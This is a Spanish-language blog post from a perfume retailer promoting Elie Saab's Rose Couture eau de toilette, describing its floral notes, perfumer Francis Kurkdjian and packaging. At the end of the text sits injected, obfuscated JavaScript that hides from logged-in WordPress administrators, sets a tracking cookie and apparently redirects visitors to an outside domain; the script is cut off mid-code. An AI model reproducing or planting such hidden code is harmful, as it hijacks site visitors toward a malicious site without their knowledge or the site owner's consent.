ES_LP_RC_850x850

Elie Saab es sinónimo de elegancia y feminidad, por ello el lanzamiento de su nueva fragancia Rose Couture nos tiene en Perfumerías Tin Tin cautivados.

El nuevo perfume de Elie Saab es moderno y espontáneo, Rose Couture es un eau de toilette inspirado en los colores fetiches del diseñador.

Perteneciente a la familia olfativa floral, Elie Saab se inspira en un bouquet de flores blancas reconocible sello olfativo del diseñador.

Elie Saab consigue a través de su perfume Rose Couture evocar un tema que le apasiona: las flores. Igual que en sus colecciones estación tras estación florecen en sus diseños.

Como el nombre del perfume nos aclara la rosa es la flor que más inspira a Elie Saab por su rica paleta de matices. Desde el color púrpura más apasionado hasta el rubor más tierno sin desdecir el fucsia empolvado.

La nariz que hay detrás de esta joya no es otra que la del famoso perfumista Francis Kurkdjian que consiguió extraer Rose Couture basándose en la joya de los perfumes de Elie Saab, ELIE SAAB Le Parfum.

¿A qué huele el Perfume Rose Couture de Elie Saab?

En sus notas de salida encontraremos una mezcla del frescor de peonía combinado con el rocío delicioso del néctar de rosa suavizado con notas frutales y un toque de vainilla.

Un aroma adictivo que llevado con ligereza por la brisa de un jazmín, diáfano como una muselina de seda…

Un suntuoso fondo amaderado sustenta esta composición aérea, como un tejido elástico estructura la fluidez de un vestido ceñido. El satén voluptuoso del sándalo y el terciopelo oscuro del pachuli, por contraste, exaltan el frescor de estos radiantes géneros florales.

Su envase delicado en un primaveral rosa pastel, tonalidad que se repite en su frasco con un sutil motivo de rosas en relieve.

ES_LP_RC_Light-Packshot

Evoca las flores que se abren en las más suntuosas creaciones del modisto.

 Elie Saab toma como musa a la joven top model alemana Toni Garrn. Una mujer que transmite su feminidad de forma espontánea.

 

SAAB_AKS11594

SAAB_AKS10739

Encuentra el nuevo perfume Rose Couture de Elie Saab en nuestra perfumería online. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone